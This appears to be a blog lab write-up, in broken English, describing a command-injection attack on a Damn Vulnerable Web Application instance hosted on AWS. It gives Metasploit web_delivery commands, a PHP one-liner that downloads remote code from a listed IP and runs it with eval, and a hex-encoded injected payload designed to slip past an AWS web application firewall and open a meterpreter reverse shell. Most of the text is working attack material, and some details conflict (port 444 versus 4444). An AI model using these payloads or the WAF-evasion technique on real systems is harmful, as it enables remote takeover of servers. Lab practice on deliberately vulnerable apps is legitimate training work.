Hello, today I play with Damn Vulnerable Web Application, this application was deployed in AWS. The objective is execute commands to gain access how root user.
First I go to option "Command Injection" and execute a ping for 8.8.8.8, that ip address is owner google, only was used for validate conexion a internet.
Now try execute two commands with help the pipe "|".
The command executed without errors, then we can try other commands, for example a reverse conexion to a remote kali linux.
In Kali linux open msfconsole and make payload, so execute the follow commands:
- sudo msfconsole
- use exploit/multi/script/web_delivery
- show targets
- set target 1
- set payload php/meterpreter/reverse_tcp
- set lhost 18.188.109.166 (Kali hosted in AWS)
- set lport 4444
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://18.188.109.166:8080/LvtZ8HfQGHYG', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
Now launch BurpSuite to sent command, in the first try get code 403
in the second try I sent the command in format encode and get same code 403
then I sent the command in format encode but 7 times encodes and get same code 403
The goal is to reconstruct the PHP functions and the URL at runtime, without literally writing `eval`, `assert`, or `file_get_contents`, and also to encode the URL in hexadecimal.
We will use:
`chr()` to generate the strings `assert` and `file_get_contents` from their ASCII values.
`\xHH` (hex escape) within a PHP string for the URL.
`$` escaping so that the shell doesn't interpret the variables as its own.
In the machine Kali Linux with msfconsole can see one sessions generate by meterpreter, then I can execute any command in this server DVWA.
127.0.0.1; php -d allow_url_include=1 -r "\$u=\"\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x38\\x2e\\x31\\x38\\x38\\x2e\\x31\\x30\\x39\\x2e\\x31\\x36\\x36\\x3a\\x38\\x30\\x38\\x30\\x2f\\x67\\x38\\x31\\x4c\\x37\\x66\\x67\\x45\\x59\\x38\";include \$u;"
Now take control of the system operative and I create a folder in the path where bypass WAF AWS
Don't forget what the machine victime and attack necessary have port 4444 open.
In the terminal de msfconsole get reverse shell of DVWA through port 444, then I can execute all the commands include in msfconsole.
The result final is see the folder in the browser
Don't forget what the machine victime and attack necessary have port 4444 open.
No hay comentarios:
Publicar un comentario